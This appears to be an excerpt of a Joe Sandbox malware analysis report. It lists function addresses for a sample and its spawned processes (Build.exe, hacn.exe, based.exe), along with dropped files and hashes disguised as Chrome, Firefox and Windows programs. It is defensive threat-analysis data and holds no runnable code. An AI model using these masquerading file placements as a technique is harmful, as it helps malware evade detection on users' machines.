Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C5C74	1_2_00007FF7691C5C74
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A95FB	1_2_00007FF7691A95FB
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A1000	1_2_00007FF7691A1000
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C8A38	1_2_00007FF7691C8A38
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B1280	1_2_00007FF7691B1280
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B0A60	1_2_00007FF7691B0A60
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B7AAC	1_2_00007FF7691B7AAC
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C518C	1_2_00007FF7691C518C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B91B0	1_2_00007FF7691B91B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691BD200	1_2_00007FF7691BD200
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B1484	1_2_00007FF7691B1484
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B0C64	1_2_00007FF7691B0C64
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B2CC4	1_2_00007FF7691B2CC4
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A8B20	1_2_00007FF7691A8B20
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C0B84	1_2_00007FF7691C0B84
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C33BC	1_2_00007FF7691C33BC
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691BFBD8	1_2_00007FF7691BFBD8
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B73F4	1_2_00007FF7691B73F4
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B0E70	1_2_00007FF7691B0E70
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C4F10	1_2_00007FF7691C4F10
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691BCD6C	1_2_00007FF7691BCD6C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B5040	1_2_00007FF7691B5040
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691BD880	1_2_00007FF7691BD880
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B1074	1_2_00007FF7691B1074
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B28C0	1_2_00007FF7691B28C0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C2F20	1_2_00007FF7691C2F20
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691BFBD8	1_2_00007FF7691BFBD8
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B1F30	1_2_00007FF7691B1F30
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C5728	1_2_00007FF7691C5728
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A9FCD	1_2_00007FF7691A9FCD
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A979B	1_2_00007FF7691A979B
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FFE13307508	1_2_00007FFE13307508
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00929906	4_2_00929906
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0092F963	4_2_0092F963
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0093EA07	4_2_0093EA07
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00938C7E	4_2_00938C7E
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_009360F7	4_2_009360F7
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00954044	4_2_00954044
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00939111	4_2_00939111
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00932125	4_2_00932125
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_009382D0	4_2_009382D0
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0092E394	4_2_0092E394
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00936445	4_2_00936445
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00931476	4_2_00931476
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00947738	4_2_00947738
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0093976F	4_2_0093976F
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00930949	4_2_00930949
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00947967	4_2_00947967
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0094FA90	4_2_0094FA90
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00923AB7	4_2_00923AB7
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00924C6E	4_2_00924C6E
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00935E86	4_2_00935E86
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00930FAC	4_2_00930FAC
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00922FCB	4_2_00922FCB
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0094FF3E	4_2_0094FF3E
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929973BC	5_2_00007FF6929973BC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692996470	5_2_00007FF692996470
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692977960	5_2_00007FF692977960
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692983BE4	5_2_00007FF692983BE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69298EC30	5_2_00007FF69298EC30
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929823A4	5_2_00007FF6929823A4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692994380	5_2_00007FF692994380
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692981B84	5_2_00007FF692981B84
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692991038	5_2_00007FF692991038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69298A530	5_2_00007FF69298A530
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929821A0	5_2_00007FF6929821A0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692981980	5_2_00007FF692981980
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692991FE4	5_2_00007FF692991FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929837E0	5_2_00007FF6929837E0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929887D0	5_2_00007FF6929887D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69299481C	5_2_00007FF69299481C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692986030	5_2_00007FF692986030
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692971F50	5_2_00007FF692971F50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692981F94	5_2_00007FF692981F94
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929790D0	5_2_00007FF6929790D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69298E11C	5_2_00007FF69298E11C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69299A0F8	5_2_00007FF69299A0F8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692991038	5_2_00007FF692991038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987D98	5_2_00007FF692987D98
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69298E5B0	5_2_00007FF69298E5B0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692981D90	5_2_00007FF692981D90
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF6929966EC	5_2_00007FF6929966EC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692996E70	5_2_00007FF692996E70
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692982E50	5_2_00007FF692982E50
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E038A8	6_2_00000202B6E038A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6DFD0E0	6_2_00000202B6DFD0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6DF1F2C	6_2_00000202B6DF1F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E22B2C	6_2_00000202B6E22B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E344A8	6_2_00000202B6E344A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E2DCE0	6_2_00000202B6E2DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E638A8	6_2_00000202B6E638A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E5D0E0	6_2_00000202B6E5D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E51F2C	6_2_00000202B6E51F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1565C74	6_2_00007FF7D1565C74
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D155FBD8	6_2_00007FF7D155FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1541000	6_2_00007FF7D1541000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1551280	6_2_00007FF7D1551280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1550A60	6_2_00007FF7D1550A60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1568A38	6_2_00007FF7D1568A38
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1557AAC	6_2_00007FF7D1557AAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D156518C	6_2_00007FF7D156518C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D155D200	6_2_00007FF7D155D200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15591B0	6_2_00007FF7D15591B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1551484	6_2_00007FF7D1551484
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1550C64	6_2_00007FF7D1550C64
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1552CC4	6_2_00007FF7D1552CC4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1560B84	6_2_00007FF7D1560B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1548B20	6_2_00007FF7D1548B20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15573F4	6_2_00007FF7D15573F4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15633BC	6_2_00007FF7D15633BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1550E70	6_2_00007FF7D1550E70
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1564F10	6_2_00007FF7D1564F10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D155CD6C	6_2_00007FF7D155CD6C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15495FB	6_2_00007FF7D15495FB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D155D880	6_2_00007FF7D155D880
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1551074	6_2_00007FF7D1551074
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1555040	6_2_00007FF7D1555040
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15528C0	6_2_00007FF7D15528C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1562F20	6_2_00007FF7D1562F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1565728	6_2_00007FF7D1565728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D155FBD8	6_2_00007FF7D155FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1551F30	6_2_00007FF7D1551F30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1549FCD	6_2_00007FF7D1549FCD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D154979B	6_2_00007FF7D154979B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE611F2C	8_2_00000273EE611F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE61D0E0	8_2_00000273EE61D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE6238A8	8_2_00000273EE6238A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE642B2C	8_2_00000273EE642B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64DCE0	8_2_00000273EE64DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE6544A8	8_2_00000273EE6544A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE671F2C	8_2_00000273EE671F2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE67D0E0	8_2_00000273EE67D0E0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE6838A8	8_2_00000273EE6838A8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1565C74	8_2_00007FF7D1565C74
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15495FB	8_2_00007FF7D15495FB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1541000	8_2_00007FF7D1541000
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1551280	8_2_00007FF7D1551280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1550A60	8_2_00007FF7D1550A60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1568A38	8_2_00007FF7D1568A38
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1557AAC	8_2_00007FF7D1557AAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D156518C	8_2_00007FF7D156518C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D155D200	8_2_00007FF7D155D200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15591B0	8_2_00007FF7D15591B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1551484	8_2_00007FF7D1551484
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1550C64	8_2_00007FF7D1550C64
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1552CC4	8_2_00007FF7D1552CC4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1560B84	8_2_00007FF7D1560B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1548B20	8_2_00007FF7D1548B20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D155FBD8	8_2_00007FF7D155FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15573F4	8_2_00007FF7D15573F4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15633BC	8_2_00007FF7D15633BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1550E70	8_2_00007FF7D1550E70
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1564F10	8_2_00007FF7D1564F10
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D155CD6C	8_2_00007FF7D155CD6C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D155D880	8_2_00007FF7D155D880
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1551074	8_2_00007FF7D1551074
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1555040	8_2_00007FF7D1555040
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15528C0	8_2_00007FF7D15528C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1562F20	8_2_00007FF7D1562F20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1565728	8_2_00007FF7D1565728
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D155FBD8	8_2_00007FF7D155FBD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1551F30	8_2_00007FF7D1551F30
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1549FCD	8_2_00007FF7D1549FCD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D154979B	8_2_00007FF7D154979B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB4358A0	8_2_00007FFDFB4358A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB5718D0	8_2_00007FFDFB5718D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB5712F0	8_2_00007FFDFB5712F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69B370	8_2_00007FFDFB69B370
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6F7B90	8_2_00007FFDFB6F7B90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6DFC00	8_2_00007FFDFB6DFC00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691451	8_2_00007FFDFB691451
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69F8B5	8_2_00007FFDFB69F8B5
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691956	8_2_00007FFDFB691956
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691DCF	8_2_00007FFDFB691DCF
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691997	8_2_00007FFDFB691997
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691398	8_2_00007FFDFB691398
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6A11A0	8_2_00007FFDFB6A11A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691A87	8_2_00007FFDFB691A87
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691C94	8_2_00007FFDFB691C94
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69114F	8_2_00007FFDFB69114F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6913F2	8_2_00007FFDFB6913F2
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB696BA0	8_2_00007FFDFB696BA0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691537	8_2_00007FFDFB691537
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6F0950	8_2_00007FFDFB6F0950
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69115E	8_2_00007FFDFB69115E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6915B4	8_2_00007FFDFB6915B4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69168B	8_2_00007FFDFB69168B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB69256D	8_2_00007FFDFB69256D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6F0250	8_2_00007FFDFB6F0250
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB691BDB	8_2_00007FFDFB691BDB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB6920AE	8_2_00007FFDFB6920AE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB740740	8_2_00007FFDFB740740
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFBAA4460	8_2_00007FFDFBAA4460
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB8F3B80	8_2_00007FFDFB8F3B80
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB907BC0	8_2_00007FFDFB907BC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB756A87	8_2_00007FFDFB756A87
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB75655F	8_2_00007FFDFB75655F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7BFA00	8_2_00007FFDFB7BFA00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB754165	8_2_00007FFDFB754165
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB753FDA	8_2_00007FFDFB753FDA
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7560A0	8_2_00007FFDFB7560A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7522E8	8_2_00007FFDFB7522E8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7521B7	8_2_00007FFDFB7521B7
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB880010	8_2_00007FFDFB880010
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB752766	8_2_00007FFDFB752766
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB76BF20	8_2_00007FFDFB76BF20
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB752289	8_2_00007FFDFB752289
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7532E7	8_2_00007FFDFB7532E7
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB76BD60	8_2_00007FFDFB76BD60
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7530C1	8_2_00007FFDFB7530C1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB887CD0	8_2_00007FFDFB887CD0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB755D8A	8_2_00007FFDFB755D8A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB756EF1	8_2_00007FFDFB756EF1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB756CBC	8_2_00007FFDFB756CBC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7529CD	8_2_00007FFDFB7529CD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB76F200	8_2_00007FFDFB76F200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB88B200	8_2_00007FFDFB88B200
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB75114F	8_2_00007FFDFB75114F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB76F060	8_2_00007FFDFB76F060
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB75213F	8_2_00007FFDFB75213F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB751EA1	8_2_00007FFDFB751EA1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB756F28	8_2_00007FFDFB756F28
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB77B850	8_2_00007FFDFB77B850
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB75704A	8_2_00007FFDFB75704A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB98F7D0	8_2_00007FFDFB98F7D0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB8874F0	8_2_00007FFDFB8874F0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB755169	8_2_00007FFDFB755169
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB753B93	8_2_00007FFDFB753B93
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB77B4C0	8_2_00007FFDFB77B4C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB8F2C40	8_2_00007FFDFB8F2C40
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB755E25	8_2_00007FFDFB755E25
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB754E4E	8_2_00007FFDFB754E4E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7560DC	8_2_00007FFDFB7560DC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7523F1	8_2_00007FFDFB7523F1
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB8DE870	8_2_00007FFDFB8DE870
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB7572C5	8_2_00007FFDFB7572C5
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB754633	8_2_00007FFDFB754633
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB76EF00	8_2_00007FFDFB76EF00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB751B22	8_2_00007FFDFB751B22
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB832EB0	8_2_00007FFDFB832EB0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB754D04	8_2_00007FFDFB754D04
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB755B0F	8_2_00007FFDFB755B0F
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB755DA3	8_2_00007FFDFB755DA3
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB753486	8_2_00007FFDFB753486
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB886310	8_2_00007FFDFB886310

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
Source: Joe Sandbox View	Dropped File: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe 9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
Source: Joe Sandbox View	Dropped File: C:\Program Files\Mozilla Firefox\dwm.exe 9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80

Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB6FD7E5 appears 101 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB75483B appears 50 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF7D1542760 appears 36 times
